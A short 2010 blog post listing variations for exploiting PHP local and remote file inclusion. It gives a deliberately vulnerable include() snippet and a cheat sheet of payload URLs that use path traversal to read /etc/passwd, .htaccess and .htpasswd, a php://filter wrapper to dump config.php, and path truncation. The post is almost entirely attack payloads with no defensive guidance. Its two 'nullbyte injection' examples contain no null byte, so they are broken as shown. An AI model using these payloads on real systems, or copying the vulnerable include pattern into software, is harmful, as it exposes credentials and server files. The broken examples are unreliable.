Friday 19 November 2010

Variations for exploiting the File Inclusion vulnerability

This post lists some of the ways that I've learnt to exploit the file inclusion vulnerability. I'm quite sure that there are much more variations and modifications to exploit file inclusion so if you have any, feel free to comment here.

Before going on this post, you might want to read my previous articles posted here before:
LFI tutorial
RFI tutorial
-> A sample vulnerable piece of code would be something like below: test.php
<?php
include("incs/".$_GET['page']);
?>

-> including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

-> path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

-> Nullbyte injection
test.php?page=../../../../../etc/passwd

-> Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

-> PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

-> Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …

I'll update it more and more when I get to know other variations on exploiting the file inclusion vulnerabilities.